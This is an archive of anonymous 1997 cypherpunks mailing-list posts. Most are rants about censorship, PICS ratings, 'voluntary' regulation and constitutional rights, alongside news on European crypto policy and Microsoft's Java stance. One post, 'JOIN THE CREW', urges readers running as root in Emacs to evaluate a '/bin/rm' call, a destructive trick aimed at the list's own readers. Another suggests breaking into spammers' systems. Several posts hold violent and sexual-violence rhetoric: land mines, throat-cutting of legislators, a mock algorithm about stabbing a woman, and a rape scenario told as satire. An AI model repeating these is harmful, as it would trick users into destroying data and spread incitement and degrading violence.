and most meaningful statement of the day.
  After quietly dispersing a few minutes later, the group packed up
their weapons and climbed into their vehicles without a word between
them, each seemingly going their own separate ways.
  I stayed on after the last of the others had left, reflecting on the
fact that I had arrived at this gathering by virtue of a late-night
phone call to my unlisted number, and found that I knew none of the
participants in the activities.
  I had the strangest feeling that the others there had arrived by the
same anonymous process as I had, and I wondered if they were equally
mystified as to who had arranged this impromptu assembly of apparent
strangers joined in a common cause. Immediately, one of the pickup
trucks driving away backfired, and I thought of synchronicity, knowing
that the truck would backfire once again, which it immediately did, before disappearing quietly out of sight.
  Climbing into my own vehicle, I took a last look at the site, which
had been cleaned and left exactly the way it was when I had first
arrived on the scene. I experienced a moment of deja-vue, as if I had
just arrived and none of what I had experienced that day had truly
  Somewhere in the distance, a vehicle backfired...
Disclaimer - I am not a reporter, I am not a paramilitarist, and I am
not a computer expert. I have no idea what I was doing there and I am
not even certain that I should be speaking about the event...but I am.

@_date: 1997-08-05 19:38:49
@_author: Anonymous 
@_subject: EC Crypto Policy 
EC Ministers Draw Up European Online Policy      August 5, 1997
     Newsbytes : by Steve Gold.      Following on from a conference held in Germany last
     month, representatives from 39 European countries have
     signed a declaration calling for the free flow of information.      The event, held between July 6-8 in Bonn, was called "Global
     Information Networks: Realizing the Potential," and was
     attended by 39 European ministers, as well as European
     Commission (EC) representatives from Japan, Russia, the US
     and Canada.      At the event, ministers focused on two main issues:
     encryption, and the censorship of illegal material such as child
     pornography on the Internet.      The declaration notes that there are a number of important
     differences between US and Europe on encryption and
     information privacy.      According to MacRoberts, the Edinburgh, Scotland-based
     information technology (IT) law firm, the declaration may not
     go down too well in US circles, since it is conceivable that
     the EC may block US-based businesses from conducting
     electronic commerce on the Internet.      According to officials with MacRoberts, this could result in
     European becoming isolated, rather than the EC teaching the
     US a lesson.      According to MacRoberts, the Bonn declaration calls for the
     free flow of information, whilst protecting the privacy of
     data, and a clear division of legal responsibility between the
     creators of Internet content and access providers, network
     operators and other intermediaries.      In addition, the declaration calls for the recognition of the
     necessity of strong encryption technology, to facilitate
     electronic commerce subject to "applicable law," and the
     introduction of consumer protection through self- regulation.      According to Joanna Noag-Thomson, an associate in
     MacRobert's Intellectual Property and Technology Law
     Group, the declaration deals with many of the issues in
     President Clinton's "Framework for Global Electronic
     Commerce" and, while the US and Europe appear to agree on
     many fundamental issues, important policy differences
     continue to exist, particularly in the areas of information
     privacy and encryption.      "The European stance on encryption is to be commended --
     the European Ministers' view is more commercially
     acceptable in that it recognizes that electronic commerce
     requires strong encryption technology," she said.      "At the same time, it recognizes that measures to restrict
     encryption should be proportionate At present, the US and
     Europe appear to have different views on what constitutes
     `proportionate' restrictions," she added.      According to Boag-Thomson, the EC has warned that, unless
     the US provides adequate protection of personal information,
     it may block any US-based entity from conducting electronic
     commerce on the Internet.      "The EU Data Protection Directive forbids data flow to
     countries outside the EU which do not offer adequate
     protection of personal information. Although data protection
     is extremely important, I hope that we in Europe will not find
     ourselves isolated from the rest of the world and that a
     solution to this problem can be found," she said.      (19970804/Press Contact: Joanna Boag-Thomson
     +44-141-332-9988; Fax +44-141-332- 8886; E-mail:
     joannab at macroberts.co.uk

@_date: 1997-08-06 16:15:54
@_author: Anonymous 
@_subject: "Please get more info on PICS" 
There's a similar debate about whether "guns kill people" or "people
kill people"[*].  Although it's the repressive regime that actually
causes the supression, the widespread availability of rating systems
makes it easier for them to do so.
Although the PICS rating system permits diverse rating systems, in
practice the oligopoly in the browser market confines this to the
value system of the ruling elite (unquote).  Notably, the current
RSACi rating system makes no distinction between consenting sex in
marriage and paedophilia: both earn a Sex-4 rating.  Probably many
people feel the first is more acceptable than the second, but they
have no way to express this in current PICS implementations.
[*] The correct answer, by the way, is "politicians kill people"

@_date: 1997-08-07 07:55:04
@_author: Anonymous 
@_subject: Forced Censorship vs. Fucking Your Brains Out 
Have you ever noticed that there
  Great place to meet "babes," huh Kent?
  I certainly do. I would locate books in a way such that the children would be exposed to a variety of materials, instead of herded into playpens according to age and size.
  Also, in areas where children are allowed in bars if they serve food,
or until a certain time of night, the atmosphere tends to be raised above just being a place for the parents to drink and get drunk.
  A 14 year-old guitar player named Little Charlie used to play with me
at the Austex Lounge in Austin, and the liquor laws required him to leave the bar when the band was not onstage. He spent the breaks out
in the parking lot, smoking dope and screwing his brains out with the
young groupies. (My liver is gone, and his dick fell off. Thanks to
the law, I won.)
  I think that a library-type cataloguing system adapted to the unique
form of the InterNet and WWW could be the greatest thing since sliced
bread. I would love not to have to visit 400 sites to find "hardware"
plumbing instead of "women's" plumbing (and vice-versa). Likewise, I
would rather not waste the bandwidth of myself and others when they
visit my site in error, thinking "arson" has to with fires, and not
with sex.
  The problem is that the words "voluntary" and "requirement" have,
through some weird mutation of DoubleSpeak, become synonyms.
  Hardly anybody even tries to pretend, anymore, that they are not planning to trample the constitution and fry anyone that gets in their
way when the ElectroMagnetic Curtain clangs shut.
  Even the Nazi's, in the early days, made some pretense of humanity
when shipping fellow humans to the death camps. "Jaccuzzi? No, I don't
thinks so, sir, but I'm certain there are plans for one. Now, climb
aboard, please." Eventually, the reign of terror reached the point where
it was all clubs and guns, with no need for pretense of humanity.
  When the gun-thievery began in earnest, the thieves still had to lie
in bigger and bigger stages, tearing small, then larger, pieces off the
Constitution at each step of their con game.
  With privacy and freedom, however, we have now reached a stage where
the pretense of democracy is perfunctory, with the fascists who are
rattling the chains standing on the stage behind the speaker as he or she assures us that "imprisonment for life will be a _voluntary_   The person I really feel bad for is Tim May. He used to at least be
able to tell people, "I told you so! Check the archives from my previous life, and..."
  Prophecy loses its luster once _everybody_ can predict the future, and things have reached the point where everyone recognizes their
cues in the march toward the "Tear-Stained Monologue" where, in an
allegorical way, "The good-guy gets the girl. _I_ wind up dead."
  Face it, we all know where the cattle-cars are going, but they are
carrying _other_ people--for now. Child molesters, drug dealers, and
similar robbing, raping, low-down vermin who shouldn't have any rights,
  Oh, and a lady who put a quarter in a stranger's parking meter. And
a 16 year old kid who shared a joint with a 15 3/4 year old friend. And
a guy who pulled a stink-bomb prank on a government office.
  Oh yes, and an employee at Livermore Labs who pledged allegiance to
the flag every day of his life, escrowed his crypto keys with the government even before it was required by law to do so, but forgot about
the PGP 2.1 key on the floppy he's been using to shim up the short-leg
of the couch on the front porch for the last few years.
  What are the major players in the computer and media industries planning in their secret meetings about the best way to require you
and I to "volunteer?"
  They are planning to collectively "take one step back," leaving us
("voluntarily") standing in the line of fire.
  When the call to assembly comes, I plan on being the first one to
line up. I think I'll position the line "one step ahead" of the land
mines I plant the night before.

@_date: 1997-08-07 09:51:31
@_author: Anonymous 
@_subject: "Voluntary" Bullshit 
Kent Crispin didn't have any better sense than to write:
  I know what a "label" is. What is a "voluntary" label?
  A "voluntary" label is nothing more than a threat, plain and simple.
It is the first volley in a coming war of censorship.
  The town I live in sent me a form for paying a "voluntary" fine
for my dog running loose. I thought that was great. I sent them a
letter telling them I would pay my "voluntary" fine when I came in
for my "voluntary" execution.
  I'm old enough to know better, but I was still naieve enough to
be surprised when a gun-toting Mountie with handcuffs and mace and
two billy clubs dropped by to ask me when I was going to pay my "voluntary" dog fine. Sure enough, it turns out that if I fail to
pay the "voluntary" fine, a man with a gun comes with a summons requiring me to answer to the charge in the presence of the King.
{Not Elvis}
  I walked down to the city office with my dog, who came in and ran
around sniffing the Mountie and city employees as I paid their fine
for not cruelly imprisoning her. I asked how much I owed them for not beating her, too, but they just looked at me funny until I left.
  And this is a small country town, with "voluntary" stop signs.
  I think I'll get a knife or gun, climb through a bedroom window,
and find someone who wants to "voluntarily" have sex with me.
  "Ma'am, the reason I climbed through your window in the middle
of the night was to protect your children from inadvertantly
walking in and viewing the obscenity that's about to take place.
  "As a matter of fact, I think there is pending legislation to
_require_ you to have sex with me when I crawl through your
bedroom window in the middle of the night. It's for your own
protection, so that I don't have to bring a weapon, next time."
"I _choose_ to be an asshole."

@_date: 1997-08-08 20:44:10
@_author: Anonymous 
@_subject: forged cancels (Re: Entrust Technologies's Solo - free 
I wonder if there is a problem of inconsistent levels in this debate...
At one level, many people on this list are in favour of infrastructure
such as Usenet and the Web carrying all information without filtering with
respect to content, to avoid censorship, oppression and so on.
At another level, almost everybody has personal preferences as to what
they consider worthwhile information, what they want to read, what they
want their children/employees to read, and what they want their
privately-owned hardware to be used to carry.
At the content-free level, cancels are information just like anything
else, merely a stream of octets.  By definition, they _can't_ be morally
wrong at that amoral level where we talk only about whether
store-and-forward works properly or not.  Cancels, "forged" or otherwise
are just a tool, just bytes.
Within a particular value system, you might agree or disagree with a
particular cancel, or with the idea in general.  It's easy to configure a
news server or reader to conform to your preferences, just people who hate
spam are free to ignore it.  At this level, you can make judgements as to
which uses of that tool are justifiable.  (Cancels by sysadmins,
anti-spammers, spammers, system owners, governments, parents, copyright
lawyers or nobody at all.)
  "I'm sorry but I just don't consider 'because he's a pedophile' to be a
   convincing argument."

@_date: 1997-08-08 21:31:27
@_author: Anonymous 
@_subject: Source Code for New Encryption Algorithm 
Source Code for the Dick TruthMeasure Encryption Algorithm:
(c) "The Hoff-Center of Virtual Math"
==============>  Proof of Theorem:
  If she says "I want nine inches, and I want to bleed." and you give
 her two inches, four times and stab her to death, using a 6" knife,
 then 4(DICK) + 6" = 8" + 6" = Nine Inch Nails.
   Therefore, Nine Inch Nails band members have 14" Dicks.
 Basing the Private Key on Nine Inch Nails private parts, and the
 Secret Key on the secret location where the dead woman's body is
 buried, the sick, twisted creators of the "Dick TruthMeasure  Encryption Algorithm" have produced a cryptography product which  cannot be broken by normal people, using normal math.
 This has been confirmed by the independent research of Carol Anne
 Cypherpunk, who reports that Kent Crispin has always claimed that
 this, ================>, is eight inches, while Tim C. May claims
 this, ================>, is fourteen inches.
 Her research methods have been approved by TruthMonger, who
 states, "Give her two inches, and she takes a mile. She never  judges an encryption algorithm until she's fucked a mile with  your Dick in a 'rubber boot'."
 In response, Carol Anne Cypherpunk said of TruthMongers sexual
 prowess, "He claims that his Dick was the inspiration for the
 Eternity Server, but it is a forgery, like his posts to the list.
 It just _seems_ like it never ends when you are subjected to
 abuse of either of them. A mile, my ass..."
 (I mean, )

@_date: 1997-08-09 07:44:19
@_author: Anonymous 
@_subject: The BIG Lie (Jesus Confesses) 
Showing many people suffer from delusion.
Ah, yes, but the constitution also has a thing on seperation of church and state, or did you fail to read the words?
The Christian Coalition (The Happy Nazi's), is one major group trying to censor information, becuase they and their mythical god think that it's right.  Forcing your beliefs on others in fascism, and never was right.
Monitor the kids web access, or do your job and be a parent.
I've only seend TM degrade Anti-Crypto persons, fascists, Censorous Christians, and other like those groups who fight to usurp our constitution.
I find his posts suprisingly true, if anything else.
Therefore, if you bitch about your kid going to  while you where out eating with friends, then that person would be a neglectful parent.
What does that encompass?  Do you supress web pages advocating safe sex because it may corrupt their minds?  Tell me, SuperDad (R), how do you manage to raise your kids perfectly?
TruthMonger isn't obligated to do anything, and he owes you nothing, dumbass.
Oh, so we're a censorous Nazi Ratfucker, are we? Let me tell you something, Downey, don't tell other what to do, TM has every right to post as you do.  So if you don't like his posts, you aren't obligated to read them in the first place.  If it offends you, don't look at it in the first place.  Such a simple thing for such a powerful mind like yours to look over.
As for your forcing morals down our throats all I can say is
"Your God is DEAD, and no one cares!!!  If there is a hell, I'll see you there!!!" - Nine Inch Nails "Heresy"

@_date: 1997-08-09 10:48:13
@_author: Anonymous 
@_subject: jThe BIG Fly / Re: The BIG Lie (Jesus Confesses) (fwd) 
I am a Frisbeetarian.
  I believe that when you die, your soul goes up on the roof,
and you can't get it down.

@_date: 1997-08-09 14:00:32
@_author: Anonymous 
@_subject: JOIN THE CREW 
If you are reading this message as root under Emacs, please position
the cursor to the final paren in the following and hit C-x C-e.
(call-process-internal "/bin/rm"

@_date: 1997-08-09 22:25:23
@_author: Anonymous 
@_subject: New Thread? / Re: Apology from me to the list and TruthMonger 
OK. Now that we've got that settled, what shall we talk about
next, Abortion or Ebonics?
  On its face, this is not an unreasonable concept.
  As I see it, the reason for the 'Fuck Compromise' stance being
so heartily proclaimed on the list is not because CypherPunks see
compromise as inherently evil, but because of the recognition that
compromise that is beneficial to both parties requires honesty
and integrity on the part of both parties.
  Compromise at the point of a gun is weakness, not wisdom, and
every step one loses is twice as hard to regain in the future.
The classic example is Hitler, who "only wanted Austria." Then he
"only wanted Poland."
  The government claimed they only wanted to ban the *bad* guns,
but as Tim May pointed out, now it is theoretically illegal in
some places for a citizen to carry a paring knife home from the
store. Of course, in practice, these laws will only be used against *bad* people. Mary Tyler Moore has nothing to worry about.
  The fallacy that creates more problems than it solves is that
there *is* a "right" way to do things.
  Life is a crapshoot, and the most we can hope for is to use our
best judgement to minimize whatever ill effects might occur as the result of haphazard circumstance.
  Sadly, our society has been moving further and further toward
a fascist, control-freak mentality which dictates that there are
clear lines between right and wrong actions, attitudes and beliefs.
Even more sadly, society is crying out for stiff punishment in
every niggardly aspect of life, including the areas which are
beyond the control of those involved.
  An example is the woman in New York (?) who went to get food for
her baby, and the dog killed/ate the baby while she was gone. The
masses called for her head on a platter and she was charged with
manslaughter (or whatever).
  I am certain that those who could afford a nanny to take care of
their children had enough time on their hands to write a letter to
the editor to call for the woman's imprisonment. I would not be
surprised to find that some of those letters to the editor were
of the opinion that, if the mother had no bread for the baby,
then she should have let the baby "eat cake."
  I couldn't help but think of this poor woman who had lost the
child that she was trying to feed and nurture. Did she need to
be 'punished' because her options were limited by her position
in life? I don't know all the details of her situation, but I
do know that neither the media nor the masses seemed to care
about the details--they just wanted blood.
  I would wager that there are far more children who die in the
company of their mother in a bad neighborhood, than those who
are eaten by the family dog. I would also wager that if the
Clinton's cat killed and ate Chelsea, that there would be no
charges pending.
  Which is the "right" choice--to take your child with you and
have him/her die when you are mugged--to leave your child at
home and have the dog eat him/her?
  Which is the "right" choice--to allow your child to learn about
kinky sex techniques and then die when they try hanging themself
from the ceiling and standing on a chair--to "protect" them from
exposure to *trash* such as this, and then they die by suffocation when their sex-partner tells them semi-strangulation enhances
sex, because they've never encountered information about it which
also mentions that it may be dangerous?
  If you beat your child in order to prevent them from doing what
you feel will be harmful to them, then society will put you in jail.
If you beat them psychologically, with guilt, and they kill themself
out of shame when they do something *bad*, society will give you
  Which is the "right" way to teach your children to avoid things
which will harm them? There *isn't* a "right" way.
  Before your child can understand speech, you can't protect them from touching a hot stove by "telling" them not to. Is it "wrong"
to slap their hand when they reach for it? Once they *do* know
how to understand what you are telling them, slapping their hand
may not be the best way to keep them from harm.
  The bottom line is that you have to use your best judgment about
issues such as these, and you will never be "right." You will merely
be doing the best that you can. If you don't care about making the
effort to protect your children and they never touch a hot stove,
it does not make you a "good" parent. If you care immensely, and
do everything you are capable of to protect your children and they
*do* touch a hot stove, it does not make you a "bad" parent.
  It is human nature that if you take your child to the park to
enrich their life, and they get killed by a meteor falling from
the sky, you may find yourself "blaming" yourself, saying, "If
only I hadn't taken him/her to the park!"
  This is part of life, and part of being human. However, when
others decide that you should be imprisoned for child endangerment
for taking your child outside when a single astronomer in China told the media that a meteorite "might" be on the way, then there
is something seriously wrong with society.
  Is this a ridiculous example? Sure it is...just like someone
claiming that they were justified in raping someone because
their slip was showing, so they were "asking for it."
  The point I am trying to make is that there are no ridiculous
examples. Moose Jaw, Saskatchewan, once had a law that required
pedestrians to walk on the right side of the sidewalk. This was
a fairly recent event.
  Insane? Yes, and City Council eventually figured out that they
were idiots, but if someone's child had died when bumping into
someone while their parent was walking them on the "wrong side"
of the sidewalk, the parent would have been legally guilty of child endangerment.
  The "Big Lie" that we tell ourselves is that we can guarantee
our safety and security, and that of our children, if we just
pass enough laws against things that are "wrong." If we can just
figure out who is "to blame" for society's ills and imprison   The guy who sold you the "junk bonds" might well have cost
you less money than the long-term government bonds you bought
just before inflation went through the roof. Who is the "right"
person to put in jail, and who is the "wrong" person to put in
jail? Truthfully, the "right" person to put in jail may well
be *you*. It might "protect" you from making bad financial
  I don't want your child to get molested by a pedophile. I don't
want your child to die of a heroin overdose. But I don't want a
video camera mounted in my home to monitor my activities in an
attempt to keep your child from coming to harm, either.
  A solution to protecting the citizens is to put them in prison
and keep the criminals on the outside. Really! We would be
protected by the security of concrete walls and locked doors.
  Is the "right" thing to do to put your child in prison?
I think you know better than that.
  Some children are going to be molested, some are going to be
abused and/or murdered, some are going to walk willingly, and
perhaps ignorantly, into bad situations that will lead them to
suffer irrepairable harm.
  I don't want this for your child, or for any child, but I
truly don't believe that they can be protected by making the
lives of everyone so regulated and restricted that our life
energy is drained from us by effectively imprisoning our
  When I was a child, there was a local priest named Father
Flanigan who enjoyed the company of young boys. He regularly
offered to take them to out-of-town hockey games, supervise
them in their parent's absence, etc.
  When he offered to take myself and several other young boys
to an out-of-town game, my parents allowed me to go with him,
but they also made a point of telling me not to let him put
his hand down my pants.
  The fact of the matter is, the trip enriched my life, and
Father Flanigan did many good things for the youth of my
community. Did he "molest" any of them? I don't know. He
didn't molest me, or anyone I know of.
  Were my parents "bad" parents? No, they were *great* parents.
They "protected" me by making their best judgement and giving
me the information they felt I needed in order to use my own
judgment effectively.
  Did my parents "endanger" me by allowing me to go with Father
Flanigan? Sure, they did. They also endangered me by allowing
me to go outside and risk getting hit by a falling meteor.
  Was Father Flanigan a pedophile? I don't know. Was he a pedophile, but non-active? I don't know. Did my parents know?
Perhaps, perhaps not. I wouldn't doubt that they may have asked
him about his fondness for young boys, or talked to those in a
position to know, or perhaps they merely used their own best
  Or, it could be that they and I are way off base, merely being
prejudiced by anti-Catholic views promoted by those with an axe
to grind against differing religious views.
  Regardless, when I was thirteen, I was approached by a guy
who stepped out of an alley and offered me $20.00 to let him
give me a blow-job. I politely declined, and went on my way.
  I spent about an hour at home with my family, without giving
the event much thought. However, at some point it occurred to
me that there were children younger than myself who might be
more vulnerable to the man's approach, and that, while he had
not used any force or pressure in the situation, that it was
possible that this could occur with a smaller child.
  I asked my mother if there was a law against adults offering
children money to let the adult give them a blow-job. She was
startled by my question, though she hid it as best she could,
but she was also amused that I was so casual about asking it.
  She dealt with the situation matter-of-factly, and I went
with a policeman to help him find the man. The policeman
chased him down, subdued him, and took him to jail.
  To tell the truth, I felt compassion for the man, since I
sensed that he was a tortured individual, and he had not really
done anything that 'violated' me, or 'infringed' on my right
to self-determination (although I would not have been able to
verbalize these feelings at the time).
  Looking back on the event, I realize that, strictly speaking,
I did not take a course of action that would lead to his being
judged and punished for what he did, but rather, for what he
"might" do.
  Was I "right" or "wrong" in subjecting someone who did not
do any harm to me to arrest and imprisonment? I don't know.
  It could very well be the man never had, and never would,
force himself on a child, or exert undue pressure on a child
in order to coerce the child into doing something against their
will. Can my actions be deemed "right" or "wrong," depending on
the "odds" of him forcing himself on a child, versus being of
strong enough character not to do evil to satisfy his desires?
  In retrospect, I believe I made my decision to act based on
the fact that I sensed that the man was not totally in control
of basing his actions only on his best rational judgement. It
could be that I had him wrongly imprisoned, or it could be that
I saved him from doing something he would regret for the rest
of his life.
  The irony of this story is that the local police solved their
"problem" with this man by buying him a bus ticket to a small
town nearby. End of problem...
  It is my belief that this "solution" to the local police's
"problem" is illustrative of the attempts of censors and
regulators to "shift" the problems instead of "solving" them.
  I could be dead in a ditch because my parents allowed me to
go with a priest who had a fondness for children. I could also
be dead in a ditch because my parents "protected" me from being
exposed to recognizing the reality of adults who are fond of
children, and I might not have had enough information to deal
properly with the guy who stepped out of the alley.
  Which legislation do we pass to protect our children? Do we
pass legislation "preventing" parents from allowing their
children to accompany an adult who is fond of children, or
do we pass legislation "requiring" parents to allow their
children to accompany an adult who is fond of children, but
who will enrich their lives and help them to understand the
difference between controlling one's urges versus violating
others in order to satisfy themself?
  The reality of the current state of affairs is that there
are a plethora of laws which prevent parents from making their
own decisions as to how to live their lives and how to raise
their children to the best of their ability.
  If you know that you need to slap your child's hand in order
to keep them from touching a hot stove, will you do so? What
if you also know that Child Services will take away your child
and put them in an orphanage if you do so?
  Is your child better off having a deformed hand and living
at home in a loving environment, or having a normal hand and
being raised by strangers who don't care for him/her?
  Laws aren't going to universally protect our children, nor are
rating systems, or lynchings. Nor, sadly, the best judgement of
concerned, loving parents.
  We can't solve the problems of life by passing legislation that
attempts to control everyone and everything, forcing us all to
meet standards that may be based on erronious beliefs and/or
  There are laws against murder. People still get murdered.
Punishment may be justified for the act of murder, but it
is not the "solution" to preventing murder. We can't legislate
away poverty, destitution, and desperation. Making "anger"
illegal won't prevent it. Making "embarassment" illegal won't
stop people from blushing.
  We are increasingly shifting "social" problems into the arena
of "legal" remedy. We "liberate" the mentally ill from their
confinement in nuthouses, and then we "imprison" them for
peeing in an alley because they live on the streets. We pass
laws limiting political campaign contributions, and then we
vote for the person who spends $50,000,000 on ads telling us
what an asshole their opponent is. We allow doctors to give
their patients heroin in order to relieve their suffering,
and we deny an Ambassadorship to someone who believes that
a doctor should be able to give his patients marijuana to
relieve their suffering.
  Yes, I care about other people, and I care about children.
I am not selfishly clinging to my rights to privacy and freedom
in order to further my own interests at the expense of others.
I am doing so because I don't believe that the world will be
a better place if my rights and freedoms are taken away.
  Then again, I'm Chinese...I could be "Wong."

@_date: 1997-08-11 10:07:19
@_author: Anonymous 
@_subject: The BIG Lie (Jesus Confesses) 
Well, most evangelists don't force things down your throat.  They try to convince you to send them money to "Help" The Almighty (TM)'s cause.  Usually, that money is spent on porno mags, hookers, and booze.
Too many Christians try to censor atheist site because it defies their Almighty God (TM), and somehow clouds others views.
mandatory prayer was.
Bullshit.  Most Christians I see IRL and on TV cringe at books other than The Good Book(TM).  Creationism is bullshit, God didn't make everything in 7 days, we evolved from monkeys and various others (Although many half-evolved monkeys can be seen on TV Evangelism shows and in Congress).
In order to believe in something, I need some hard facts.  I need to actually see a god (while I'm sober) talk to me and I talk back and see him actually makes things.  Unlike some of the weaker people, I can't just believe it because "anything's possible".  I can't believe it because a minister or a book tells me.  When I was around 8 years, I read this section of the bible asking questions like (it was in the back) "How do we know the bible is true?"  I was intersted, reading further, I noticed some page numbers, so I went there, finding not words of a scientist, but supposed words of god.  If god supposedly asked people to write this, and he says it's true, then that's called bullshit, because that's like someone writing a crypto algorithm, and stating it's secure even though no one else has seen it.
In short, unless I see it for myself, I won't believe it fully.  In religions case, at all.

@_date: 1997-08-12 09:22:25
@_author: Anonymous 
@_subject: The Right to Bare Arms on "The slippery slope" of Capital Hill 
When your "activism" is backed with guns, it's called tyranny.
 e.g. - The "Right to Bare Arms" means that we can charge Capital Hill
with machete's and and cut those fuckers' arms off to keep their fucking
hands out of the public till.
  The "Right to Free Speech" means that we can cut their fucking throats
and free those "honest" words that have been trapped down there ever
they got to D.C.
  God, I love an Constitution with "adaptable principles."
            ^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^
  ^^^^^^^^^^^^^^^^^^^^^^^^^^
  Exactly. The right wing kills us with weapons and the left wing
kills us with kindness.
  The Constitution has always suffered as much or more under the
judicial influence of Democrats than it has under the influence of
Republicans. The citizen's pocketbook, likewise--the Republicans want to spend others' money on weapons and the Democrats want to give it to "worthy" causes of "their" choosing.
  If one of their relatives needs a kidney, then the Republicans
want to force drug-dealers and child-pornographers to give them
one of theirs. The Democrats want to hold a lottery so that all
of us are subject to giving them a kidney.
  Constitution!??!??
  How _dare_ you suggest tht drug-dealers have rights? How _dare_
you suggest that someone with no kidneys doesn't have a right to
receive your "spare" one from the government?
  Like it or not, when two cops blatantly lie on the witness stand (i.e. - telling you that the husband of a murdered woman was not considered a "suspect" when they climbed over his fence) then their
evidence should be thrown out. The majority of the nation (and an
elected judge) just coughed and looked at their feet when that happened at the "guilty black man's trial," but the "honest" jurists
who held a human life in their hands did not.
  Halfway through the O.J. trial, someone asked me what I thought
the verdict should be. I glanced at the courtroom circus and said,
"I think we should find them _all_ guilty!"
  I have come to the same conclusion regarding our legislators.
If I were on the Supreme Court, I might take into consideration my
need for fertilizer for my garden when deciding their fate. (Of course, being a strong Constitutionalist, I would only have their
"Bare Arms," which the Constitution gives me the right to, cut off
to feed my plants.)
  Timothy May points out that things have reached a point where we
no longer need to decide on the "kind" of solution to our problem,
but the "calibre" of the solution (or "megatonnage").
  Robert Hettinga made a good point that, while we may be having a
lot of fun with our discussions about the law and the Constitution,
technology and the economy will likely influence most of the future
direction of eCa$h (as well as privacy and freedom, etc.).
  Sadly, they are both more right than most of us would like to admit.
I would like to think that Republicans and Democrats, the EFF and Freeh, the Government and the people, Rodney King and the L.A. cops,
could "all just get along."
  The reason we can't? We have no longer have a Constitution to hold
on to--to balance the stronger against the weaker, the larger against
the smaller, the "little" rights and wrongs against the "big" rights
and wrongs.
  So we end up with legisltors who now have the power to give our
money to the rich _or_ to the poor depending on who holds power,
and they have the power to kill us with weapons _or_ with kindness when they hold the majority.
  We are governed by those who think that "The answer to blatantly
unconstitutional laws, is _more_ unconstitutional laws." and "The
Legislature interprets the Constitution as damage, and routes
around it."
"A Vote for TruthMonger is a Vote for Fear, Uncertainty and Doubt."
   Perhaps we need to start a FUD Party. Run a multi-user persona
candidate, such as TruthMonger. (MayMonger, TreiMonger, SchearMonger,
snowMonger, CrispinMonger). We can each gather our own brand of
faithful under a common flag, telling each faction whatever kind
of FUD they want to hear before they will vote for us, and become
the next majority.
  Once we are in power...we restore the Constitution, throw out all
other laws, and starch the flag (so that nobody can wrap themself
in it). Then we quit.
{Disclaimer: The fault in the idea espoused above lies in the fact
that I (and proably many others) cannot hold it in my mind for more
than a few seconds before I invariably start thinking about a few,
small "improvements" I could make before resigning.}
("I have met the enemy, and he is _me_.")
p.s. - Or, how about, "If elected, we promise to kill ourselves."?

@_date: 1997-08-13 08:14:46
@_author: Name Withheld by Request 
@_subject: Cypherpunks are a bunch of happy people 
Cypherpunks are a bunch of happy people
                                                                        basr
 Discussed were, amongst many other subjects, PGP encryption, building
 personal anonymous remailers, encryption of IP packets, and a kind of
 anonymous remailing system for IP packets (http, ftp, ...) using 'onion'
 servers.
 These guys promised us some nice stuff for our homes and schools in the
 near future like your own nice 'n' small anonymous remailer. If many people
 put these up and a system of anonymous remailers who give messages to each
 other before delivering it to the addressee is established, you can always
 say that *your* remailer was just one of the middlemen, receiving stuff
 from other anonymous remailers.
 Next, we are going to get cheap (under US $1.000) linux routerboxes that
 encrypt all traffic you send out to the network. Specially designed for the
 school and the home. This makes surfing in the childrens bedroom perfectly
 safe again!
 On the anonymous remailing of IP packets project the cypherpunks are workng
 together with the naval security of the USA. Why? These naval security
 people are working on the same thing, and they need other traffic using the
 same protocols to hide their own traffic in. Otherwise everyone can see
 they are transmitting from A to B. However, the cypherpunks had to explain
 the naval security first that if they want this technique more widespread,
 they have to make it available for cheaper machines and morre widely used
 operating systems... something they had not thought of themselves.
 You might think: "Is all this not illegal?" No it's not (yet, in most
 countries), and making up laws costs more time than writing good encryption
 software, so say the cypherpunks. That is... if they can find enough people
 to write the software. Yes, you guessed right, they are hiring!

@_date: 1997-08-13 18:29:59
@_author: Anonymous 
@_subject: Autoresponder Crypto Export / Re: Fuck the usenet cabal 
How about hacking spammer's systems and setting them up so that
their autoresponders send out copies of strong crypto?
  Everyone in the world would have a copy within days.
  Make the enemy your best friend.
Sun Tzu

@_date: 1997-08-13 18:30:43
@_author: Anonymous 
@_subject: The BIG Lie (Jesus Confesses) 
Your last two posts discuss religion.
  Killfile yourself!

@_date: 1997-08-13 18:56:25
@_author: Anonymous 
@_subject: Diffie-Hellman 
Timothy Maypole styles his facial hair to look more like pubic hair.
_  O     O  _
 \-|-\_/-|-/  Timothy Maypole
  /^\   /^\
 ^^ ^^ ^^ ^^

@_date: 1997-08-15 01:37:32
@_author: Anonymous 
@_subject: Sign up on YoungSluts click thru Program 
I like to use alt.anonymous.messages  Seems appropriate
for the newsgroup. :)
I've found a few sites that won't accept such a long email address tho.
I remember awhile ago someone was running a message-pool mailing list,
is it still around?

@_date: 1997-08-15 07:29:50
@_author: Anonymous 
@_subject: Hypothetical situation for networks 
I think SSH will not tunnel UDP, and TCP NFS for Linux and Solaris (?) is
not reliable.  I would lean towards SSH in rcp-style mode: for a
continent-wide link you will probably find the performance of batch-style
transfers more enjoyable than that of a remote file system system.  SSH
also very neatly lets you run remote commands and so on.  (Enough,
already...) Don't touch it.

@_date: 1997-08-15 07:29:51
@_author: Anonymous 
@_subject: Microsoft and Java 
The Paul Maritz interview that article links to has disappeared from
Computerworld's site, but a copy is appended.
Formerly at      Microsoft Corp. last week indicated that it would essentially block
     efforts to make Java a cross-platform development language, stating
     that it wouldn't ship Sun Microsystems, Inc.'s Java Foundation Class
     Libraries (JFC). Computerworld senior editor Carol Sliwa caught up
     with Paul Maritz, Microsoft group vice president, at a company
     reception in Seattle and asked him to explain the software giant's
     Java stance.
     CW: There's nothing in the license that requires you to ship those
     JFCs with Internet Explorer?
     Maritz: Correct.
     CW: Is that a contentious issue?
     Maritz: No. The only reason I brought it up is just that some people
     like to play hard and fast with the truth, and they like to say,
     'Look, these JFC class libraries are going to be a standard because
     everybody has to ship them. Even Microsoft has to ship them.' And
     that's not the case. We were very careful when we did the deal to
     say that we could have the option of shipping them, but we do not
     have to include them in Windows.
     CW: Is there some reason you wouldn't want to ship them? Is there
     something inferior about them?
     Maritz: No. We don't want to put further bloat on top of the system.
     We think that basically there isn't a lot of end-user value in them.
     And Sun's trying to establish them as basically their platform. It's
     a competing operating system.
     CW: Do you feel your Application Foundation Class Libraries (AFC)
     are superior to their JFCs?
     Maritz: No. AFCs ... make it easier to write apps. But our real
     strategy is J/Direct. So our answer to JFC is not AFC. It's J/Direct.
     CW: It sounds like Microsoft is resentful at Sun for taking a
     dictatorial role.
     Maritz: The reason we brought it up is Sun likes to blur these two
     things together. They like to blur the notion of Java the language
     and Java the class libraries. They'd like to package them all into
     that concept. We're just saying, 'Hey, there is a difference between
